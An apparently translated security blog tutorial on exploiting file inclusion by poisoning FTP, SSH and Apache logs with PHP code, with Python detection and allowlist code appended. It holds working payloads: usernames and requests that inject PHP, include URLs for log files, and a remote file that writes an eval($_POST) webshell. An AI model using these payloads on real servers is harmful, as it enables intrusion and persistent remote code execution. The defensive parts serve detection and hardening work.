[Aggregated article] LFI vulnerabilities: log file analysis

.Net 2017-12-08 17 views

Author: v5est0r

I. Application, security, system and DNS logs

Default location: %systemroot%/system32/config, default file size 512 KB; administrators usually change this default size.

  • 1. Security log file: %systemroot%/system32/config/SecEvent.EVT

  • 2. System log file: %systemroot%/system32/config/SysEvent.EVT

  • 3. Application log file: %systemroot%/system32/config/AppEvent.EVT

II. Internet Information Services (IIS) logs

  • 1. Default location of the IIS FTP log: %systemroot%/system32/logfiles/msftpsvc1/ ; one log file per day by default (file name format: ex + last two digits of the year + month + day, so the log for 10 August 2002 is ex020810.log)

  • 2. Default location of the WWW log: %systemroot%/system32/logfiles/w3svc1/ex170531.log ; one log file per day by default (file name format: ex + last two digits of the year + month + day, so the WWW log for 10 August 2002 is ex020810.log)

ASP file inclusion vulnerabilities are rarely seen. The test environment was IIS 6.0, which allows neither crossing directories nor absolute paths:

  Active Server Pages 错误 'ASP 0131'
  不允许的父路径
  /lfi.asp,行 6
  包含文件 '..\pagerror.gif' 不能用 '..' 表示父目录。

When the server runs both IIS and Apache, things get easier (ColdFusion setups, for instance, usually serve both aspx and php).

  C:\Documents and Settings\Administrator>ftp 172.16.12.2
  Connected to 172.16.12.2.
  220 Microsoft FTP Service
  User (172.16.12.2:(none)):<?php phpinfo();?>
  331 Password required for <?php phpinfo();?>.
  Password:

Log entry:

  10:13:56 172.16.12.3 USER <?php+phpinfo();?> 331 0

  ➜  ~ ssh '<?php phpinfo();?>'@192.168.1.1
  <?php phpinfo();?>@192.168.1.1's password:
  Permission denied, please try again.
  <?php phpinfo();?>@192.168.1.1

Checking the server, /var/log/secure records the complete one-liner:

  Jun  8 18:33:43 localhost sshd[28316]: Invalid user <?php phpinfo();?> from 36.149.78.132
  Jun  8 18:33:43 localhost sshd[28316]: input_userauth_request: invalid user <?php phpinfo();?> [preauth]
  Jun  8 18:33:50 localhost sshd[28316]: pam_unix(sshd:auth): check pass; user unknown

But the conditions are rather strict: the file is readable only by root, so the web server process normally cannot include it:

  -rw-------. 1 root   root    308425 Jun  8 18:49 secure

On Ubuntu the corresponding file is /var/log/auth.log:

  http://192.168.199.198/c.php?file=/var/log/auth.log

  Jun  8 21:33:46 ubuntu sshd[4625]: Failed password for invalid user <?php phpinfo();?> from 192.168.199.151 port 59879 ssh2
  Jun  8 21:33:47 ubuntu sshd[4625]: message repeated 2 times: [ Failed password

Web container logs

It is not only IIS: Apache, Nginx and other web servers also keep user access logs and error logs, at default paths that depend on the distribution and installation.


Writing our code into the log is then a matter of requesting:

  http://target.com/<?php phpinfo();?>

A browser would URL-encode the request, so send it with Burp Suite instead to get past the encoding. The error log then contains the raw tag, and the log is included through the vulnerable parameter:

  AH00127: Cannot map GET /<?php phpinfo();?>  HTTP/1.1 to file

  http://172.16.12.2/lfi.php?file=C:\phpStudy\Apache\logs\error.log
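From the defender's side, every poisoning step shown above (FTP username, SSH username, Apache request line) leaves the PHP open tag in a log field, and the include step leaves a request parameter pointing at a log file. The following added detection script is not part of the original article; it runs over constructed sample lines modelled on the entries above (addresses and hostnames are made up) and flags both signals.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines, modelled on the entries quoted in the article
# (Apache error log, sshd /var/log/secure, IIS FTP log, Apache access log).
# Hostnames and addresses are made up; nothing here is a real capture.
SAMPLE_LOGS = [
    'AH00127: Cannot map GET /<?php phpinfo();?> HTTP/1.1 to file',
    'Jun  8 18:33:43 host sshd[28316]: Invalid user <?php phpinfo();?> from 192.0.2.10',
    '10:13:56 192.0.2.11 USER <?php+phpinfo();?> 331 0',
    'Jun  8 18:33:50 host sshd[28316]: pam_unix(sshd:auth): check pass; user unknown',
    '192.0.2.12 - - [08/Jun/2017:21:40:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 512',
    '192.0.2.13 - - [08/Jun/2017:21:41:07 +0000] "GET /lfi.php?file=../../var/log/httpd/access_log HTTP/1.1" 200 90',
    '192.0.2.14 - - [08/Jun/2017:21:42:30 +0000] "GET /%3C%3Fphp%20phpinfo()%3B%3F%3E HTTP/1.1" 404 209',
]

# Two signals the technique leaves behind:
#  1. a PHP open tag landing in any log field (the "poison" step), and
#  2. a request parameter whose value climbs directories or names a log
#     file (the "include" step).
PHP_TAG = re.compile(r'<\?(?:php\b|=)', re.IGNORECASE)
LOG_INCLUDE = re.compile(
    r'[?&]\w+=[^\s"&]*(?:\.\./|/var/log/|/logs?/|\.log\b)', re.IGNORECASE)


def scan_line(line):
    """Return the list of finding names for one log line (empty if clean)."""
    decoded = unquote(line)   # %3C%3Fphp -> <?php, so URL encoding does not hide the tag
    findings = []
    if PHP_TAG.search(decoded):
        findings.append('php_tag')
    if LOG_INCLUDE.search(decoded):
        findings.append('log_include')
    return findings


def scan_log(lines):
    """Return (line_number, findings) for every line that triggers a finding."""
    return [(n, f) for n, line in enumerate(lines, 1) if (f := scan_line(line))]


if __name__ == '__main__':
    for n, findings in scan_log(SAMPLE_LOGS):
        print(f'line {n}: {", ".join(findings)}')
```

A `php_tag` hit in an authentication or web log is worth an alert on its own; `log_include` on a page that takes a file parameter is the include attempt and should be correlated with the same source address.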

Remote file inclusion is simpler:

  http://192.168.199.198/c.php?file=www.baidu.com/hack.txt

The remote txt file contains:

  <?php fputs(fopen("shell.php","w"),'<?php @eval($_POST["pass"]);?>');?>

Requesting it writes a one-line webshell to shell.php; a full webshell can be written the same way:

  <?php fputs(fopen("shell.php","w"),base64_decode("<base64 of the PHP webshell>"))?>
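Both the local and the remote variant above hinge on one thing: the `file=` parameter of c.php and lfi.php reaches include() unchanged. The following added example is not from the article; it is a hypothetical Python version of the fix a defender applies to such a parameter, mapping a user-supplied page name to a file only through an allowlist. The `pages` directory and the page names are made up for the demonstration.

```python
import os
import re
from urllib.parse import urlsplit

# Hypothetical settings for the demonstration: the only directory whose
# files may be included, and the template names the application really has.
PAGES_DIR = os.path.abspath('pages')
ALLOWED_PAGES = {'home', 'about', 'contact'}


def resolve_include(user_value, base_dir=PAGES_DIR, allowed=ALLOWED_PAGES):
    """Map a user-supplied page name to a file path, or return None.

    Anything that is not a bare allowlisted name is refused, so a URL
    (remote include), an absolute path, a traversal sequence or a log
    file path can never be handed to include().
    """
    if not isinstance(user_value, str) or len(user_value) > 64:
        return None
    # A scheme (http://, ftp://, php:// ...) means a remote or wrapper include.
    if urlsplit(user_value).scheme:
        return None
    # Control characters, path separators (either flavour) and '..' are all out.
    if any(ord(c) < 32 for c in user_value) or re.search(r'[\\/]|\.\.', user_value):
        return None
    if user_value not in allowed:
        return None
    path = os.path.normpath(os.path.join(base_dir, user_value + '.php'))
    # Belt and braces: the resolved path must still sit inside base_dir.
    if os.path.commonpath([base_dir, path]) != base_dir:
        return None
    return path


if __name__ == '__main__':
    for value in ('about', '../../var/log/httpd/access_log',
                  'C:\\phpStudy\\Apache\\logs\\error.log', 'http://example.com/hack.txt'):
        print(repr(value), '->', resolve_include(value))
```

Alongside the code-level fix, the remote variant is also closed at the interpreter level by keeping allow_url_include switched off in php.ini.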
